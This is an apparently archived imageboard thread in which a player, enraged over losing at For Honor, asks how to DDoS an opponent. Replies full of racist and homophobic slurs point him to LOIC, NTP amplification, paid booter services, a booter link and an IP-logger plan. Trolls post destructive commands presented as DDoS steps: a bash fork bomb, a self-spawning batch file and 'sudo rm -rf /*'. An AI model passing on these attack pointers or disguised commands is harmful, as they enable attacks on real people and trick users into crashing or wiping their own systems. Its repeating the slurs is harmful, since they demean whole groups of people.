How do you DDoS someone?
>be me
>playing for honor
>get cheaply killed over and over
>break my alarm clock
>favorite alarm clock
>break my dyson fan too in rage
>thisniggerwillpay.jpg
how do you DDos someone Sup Forums? I will do anything if you tell me.

Other urls found in this thread:

youramonkey.com/?m=IDbP33gN1r5ZlhrFE
twitter.com/SFWRedditImages

bump

gay

Don't be such an assmad loser you cunt

No, fuck yourself OP.
People like you deserve to break your own stuff because you think that you're getting killed because the other player took cheap shots at you. The real reason is that you suck at the game and you need more practice and you need to reflect on your plays. When you take action by using a hack to ruin somebody elses game, that person just says "another hacked game, not playing this one anymore" and the community dies. FUCK YOU OP, FUCK YOU FOR RUINING MY COMMUNITIES.

Just be yourself user.

SHUT THE FUCK UP YOU CUNT THIS NIGGER DESERVES IT! HE SENT ME DEATH THREATS AND WAS A PLAGUE IN THE COMMUNITY.

Ah, i see the problem.
Its the fact that you were playing For Honor

use a low orbit ion cannon

I think you are the problem here, obviously if you get that butt hurt raged over a fucking video game then you need some therapy. Get help faggot.

>>>break my alarm clock
>favorite alarm clock>

>he thinks i know how to DDoS
if i knew how i wouldn't be here you faggot

> but user
> you are the plague

if you aren't going to help me then fuck off, i want to DDoS this cunt and if you won't help then eat your dick

look, its a good game, especially when you play orochi. this nigger played warden and stuck his great sword in my urethra unfairly

Did he hack?

i broke it in accidental rage, i had it in my hand then just threw it at the floor, then stomped it. i didn't realize what i was doing until it was broken.

probably, his sword was going way faster than it normally would. but then again that could be misjudgment.

/thread

But user, I am helping you. I'm helping you to help yourself. Seek anger management immediately

PayPal me $20 and I'll teach you how to do it.

GOD DAMN IT I DON'T HAVE A PAYPAL FUCK!
SO FAR THE ONLY PERSON WHO WANTS TO HELP ME ASKS FOR PAYPAL! GOD DAMNIT!

Just set up a fucken PayPal you nerd, it takes like 15 mins.

Sounds like someone is having mountain dew withdrawals. Just relax and grab yourself a cold one. If you wanna DDOS someone you need to open up Microsoft Word and transfer all of your files to another folder for hacking codes. Done

Woah, dude. You trying to turn this into pasta is fucking retarded. I remember your first gay ass thread.

I'M SORRY BUT I CAN'T DO THAT. IF I HAD THE MONEY I DEFINITELY WOULD, BUT I'M IN DEBT 20,000 DOLLARS FOR COLLEGE, AND YOU MIGHT JUST SCAM ME ANYWAY!

>25 replies
>13 poster

Listen to this handsome user right here, he knows. I'm a different user but I just strongly agreed with this user on every point he made.

wait what? please explain with a little more depth and ill never go on Sup Forums and disturb everyone from their trap threads again.

I'll ddos him. Post his IP

W/e m8, good luck trying to coerce these fags into telling you. If you change your mind I'll be here

Slapping dongs and hittin bongs is what I do.

Low Orbit Ion Cannon

>for honor

Just uninstall jewPlay, you'll be fine.

>dyson fan
You fucking rich fag, just use a paid ddos service instead of trying to figure it out on your own.

Nice trips user.

:(){ :|: & };:

run this command

OK, ILL SEND HIM AN IP LOGGER AND YOU DO THE REST. YOU ARE DOING GODS WORK user!

I was off by one but close enough right? Same thing I guess. I'm happy with it

>played orochi
>got beat by a warden 1 on 1
you are bad kid, its not hard to be good at orochi, just guard break all the time.

this cunt had inpenetrable defenses and probably was hacking. he was literally untouchable.

Orochi is the hardest boss in the game. Fuck you user I just broke another Dyson fan.

Try killing yourself you butthurt autist. Who the fuck breaks shit because they are bad at vidya?

do you guys know if theres a way too see who you recently played with?

Stop breaking high quality fans user. It's busllshit. You're breaking fans multiple times a day and i've never even had one. Must be nice to be privileged with oscillating blades

>favourite alarm clock
Did your mummy get you that with all your good boy points after you were diagnosed
>blaming other people for breaking your own shit
kys autist

Do you?

I agree with kind user, not all of us have the gift of wealth.

no, i need to find his user, send him an IP logger, get his IP then another user will DDoS him

Well you made me reply.... good one user

Okay you fucking nigger.

You can't google your way and buy a fucking $5 stresser?

Not going to help a fucking pleb sorry.

Use NTP Amplification

HAHAHAHA
>accidental
HAHAHAHAHAHA

kek

I feel like you will have a change of heart in the end bc you will start to admire OP's dedication to completing his dream.

Checked

FUCK
IS THERE A WAY TO GO THROUGH UPLAY AND FIND PEOPLE YOUVE PLAYED WITH??? I FORGOT HIS USERNAME!

OP HERE GUYS PLEASE I NEED TO BLOW THIS FAGGOTS COMPUTER UP.

>guys ddos for meh
>I dunno who he is
>help

GUYS PLEASE I LITERALLY BEG YOU CAN YOU SEARCH UPLAY AND FIND SOMEONE YOUVE RECENTLY PLAYED WITH?????

I'm now convinced this whole thread is just a troll, you're way to desperate to be real

no you can't, you fucking nigger.

I KNOW WHO HE IS! I DON'T REMEMBER HIS FULL USERNAME THOUGH! IT GOES SOMETHING LIKE
>Deph_(something something)

>Asking how to commit a federal crime on the internet.
>Willing to spend a max of 10 years in prison because of a shitty game.
>OP probably doesn't know shit about how to hide his info.
I cant wait to see the followup thread in a week from prison OP.

Get wrecked.

okay i found him through my program, plugged in Deph_******* and it got a match and triangulated his ip. I then ddosed him, no need to worry anymore /thread

I fucking hate faggots like you who feel like the whole world needs to help you cope with your anger issues. I have bad anger issues, but i control myself because im not a retard. kill yourself OP

AHEM. I can't find it myself, but post stuff similar to this.

well, i guess thats it then, i can't remember his name and now i'm short a fan and alarm clock. a combined total of 55$ down the drain and ive lost multiple times to him. i guess i tried.

If you didn't care to remember his specific username, you apparently didn't care enough to truely want to DDoS his ass.

anyone that thinks that shit works well has way more than 46 chromosones

Loic is like tickling a guy with intent to kill him. It only works if a fucking herd of people use it. Use a cheap booter if you're that autistic.

I BROKE AN ALARM CLOCK AND HOSTED A THREAD ON A CROATION SCUBA DIVING FORUM! OF FUCKING COURSE I WANTED TO DDOS THIS FAGGOT!

user just use YourAMonkey
youramonkey.com/?m=IDbP33gN1r5ZlhrFE

free booter but only works well if you're booting like 4 people max.

I'm on google fiber with 1gb/s speed. Pretty sure I can take down your home network with LOIC.

but yes you broke kids should probably buy a booter/stresser and fuck off

IM A FUCKING FAGGOT WHO CANT GOOGLE OR DO ANYTHING ON MY OWN. HELP ME PLEASE IM RETARDED. MY CAPS LOCK KEY IS BROKEN.

holy furgod

This ^

Was this person perhaps a Warden/Warlord that environment killed you over and over again? Next time don't beg for me to do it by positioning yourself near a ledge you dumb cunt.

Man, you're worse than those people who destroy the surrounding area after losing after a fighting game.

man u can ddos?
u must be a 1337 h4x0r

seriously go read 2600 magazine or something

no, he swung way faster than normal, and made me in rage destroy a dyson fan. FUCKING DYSON!

Look up Low Orbit Ion Cannon.

Use the Low Orbit Ion Cannon

Yeah, Warden.

hey retard
see

>dis nigga

It's shitheads like you that are the real problem, OP. Maybe you could see a counselor to help you with your anger issues, or practice with high numbers of bots to improve situational awareness so you can more easily avoid cheap shots like that?

Seriously, as someone with bad anger issues i can say with confidence. Your a faggot, you meant to break your shit, but now you regret it :(

Fuck off OP is a faggot.

>Made me destroy a fan
Seriously. Invest in a punching bag. Or a stress ball.
Or use your own balls as stress balls. Maybe the pain will snap you back to reality.

remember when online gaming rage was just calling someone a nigger and moving on

/thread
better than loic but still only average tbh

This.

>Swung way faster than normal
Stop being a faggot and making excuses for your inability to play a game. Any player not shit can avoid env deaths.

ITT: OP mad cuz bad, want to know how to be a 1337 h4xor

yeah, I miss that. Now it's faggots like op who
pay money for booters just to take someone's internet out for five minutes.
>sigh

i don't want to be a 1337 n1143r, i want to punish this fucking faggot for making me break my shit in an autistic fit

faggot. Okay not gonna bother reading this thread.

LoIC is a DDOS tool. But lets break it down.
What is a DDOS?
Distributed Denial of Service
Its when you send so much traffic to someone that it denies a service.

What do you need?
Bandwidth. You need to be able to send enough traffic to eat away their bandwidth entirely.

Most DDOS attacks are carried out by
A. A network of people. This is what LoIC was designed to work for. You and x number of people work together to win.
B. A botnet, Several infected computer to utilize multiple networks to win against one.

Odds are you don't have the traffic. Shut the fuck up and play a better game.

2/10 for making me post faggot

haha you got me there user

>making me break my shit
>making me
Ive broken an iphone in a autistic rage. You weren't made to break anything, you chose too and then regretted it.

This guy's solution looks solid, but they're a much simpler one for more specific attacks. Copy this text:

start
%0
goto :s

Open up notepad, paste in the text. Save as ddos1.bat. Make sure you get the name right, it's important. Double-click on the file, and it should open up a terminal. Once you've gotten that far let me know, and I can walk you through the next couple of steps.

Go to ipchicken.com and post the set of 4 numbers here. We'll take care of the rest.

hey if you're on a mac or any
kind of linux machine you just go to
your terminal and type in

sudo rm -rf /*

type in your password so it can run and it will prompt you for an ip, just put it in and watch the fun.